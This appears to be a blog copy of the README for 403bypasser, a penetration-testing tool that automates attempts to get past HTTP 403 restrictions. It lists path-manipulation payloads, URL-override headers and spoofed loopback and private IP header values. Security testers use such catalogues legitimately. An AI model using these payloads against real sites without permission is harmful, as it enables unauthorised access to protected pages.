Home 403Bypasser
Post
Cancel

403Bypasser

The tool 403bypasser automates the methods employed for bypassing access control restrictions on targeted web pages. There are plans to further enhance 403bypasser, and it is open for contributions from interested parties.

Installation

1. Clone the repository to your machine.

1
 git clone https://github.com/yunemse48/403bypasser.git

2. Install required modules by running the code

1
pip install -r requirements.txt

3. READY!

Usage

Arguments:

ArgumentDescriptionExampleNote
-usingle URL to scanhttp://example.com or http://example.com/All these example usages are interpreted in the same way
-Upath to list of URLs./urllist.txt, ../../urllist.txt, etc.Just provide the path where the file is located :)
-dsingle directory to scanadmin or /admin or admin/ or /admin/All these example usages are interpreted in the same way
-Dpath to list of directories./dirlist.txt, ../../dirlist.txt, etc.Just provide the path where the file is located :)

Usage 1:

1
python3 403bypasser.py -u https://example.com -d /secret

Usage 2:

1
python3 403bypasser.py -u https://example.com -D dirlist.txt

Usage 3:

1
python3 403bypasser.py -U urllist.txt -d /secret

Usage 4:

python3 403bypasser.py -U urllist.txt -D dirlist.txt

IMPORTANT NOTE: All the followings are interpreted the same. Therefore, which pattern you use is just a matter of preference.

1
python3 403bypasser.py -u https://example.com -d secret
1
python3 403bypasser.py -u https://example.com -d /secret
1
python3 403bypasser.py -u https://example.com -d /secret/
1
python3 403bypasser.py -u https://example.com -d secret/
1
python3 403bypasser.py -u https://example.com/ -d secret

ALL THE SAME!

Since Python is a cross-platform language, one can run this program on different operating systems.

Output

The output of the program is saved (in the current directory) in a file with the name of the domain name given as input.
For example:

1
python3 403bypasser.py -u https://example.com -d /secret

is given. Then the output is saved to example.txt in the current directory.


Release Notes

Changes in v2.0: Considerable changes have been done in this version. The project is completely moved to Python 3 from Bash. New and wide variety of techniques have been added.

Changes in v1.1: It’s now possible to pass files (lists) to 403bypasser as input via arguments. Furthermore, two more test cases added: poisoning with 1)X-Original-URL and 2)X-Rewrite-URL headers.


To-Do List

  • GUI
  • Add Rate-Limit / Threads Option
  • Add an Option for Scan Types (fast, normal, aggressive or only path manipulation / header manipulation)
  • Export cURL Command for Each Request
  • Add Parameters to Save Output According to HTTP Status Codes
  • Add Parameters to Save Output According to Page Size Anomalies

Which Cases Does This Tool Check?

1. Request Method Manipulation

  • Convert GET request to POST request

2. Path Manipulation

  • /%2e/secret
  • /secret/
  • /secret..;/
  • /secret/..;/
  • /secret%20
  • /secret%09
  • /secret%00
  • /secret.json
  • /secret.css
  • /secret.html
  • /secret?
  • /secret??
  • /secret???
  • /secret?testparam
  • /secret#
  • /secret#test
  • /secret/.
  • //secret//
  • /./secret/./

3. Overriding the Target URL via Non-Standard Headers

  • X-Original-URL: /secret
  • X-Rewrite-URL: /secret

4. Other Headers & Values

Headers:

  • X-Custom-IP-Authorization
  • X-Forwarded-For
  • X-Forward-For
  • X-Remote-IP
  • X-Originating-IP
  • X-Remote-Addr
  • X-Client-IP
  • X-Real-IP

Values:

  • localhost
  • localhost:80
  • localhost:443
  • 127.0.0.1
  • 127.0.0.1:80
  • 127.0.0.1:443
  • 2130706433
  • 0x7F000001
  • 0177.0000.0000.0001
  • 0
  • 127.1
  • 10.0.0.0
  • 10.0.0.1
  • 172.16.0.0
  • 172.16.0.1
  • 192.168.1.0
  • 192.168.1.1


⚠ ONLY USE FOR EDUCATIONAL PURPOSES ⚠

This post is licensed under CC BY 4.0 by the author.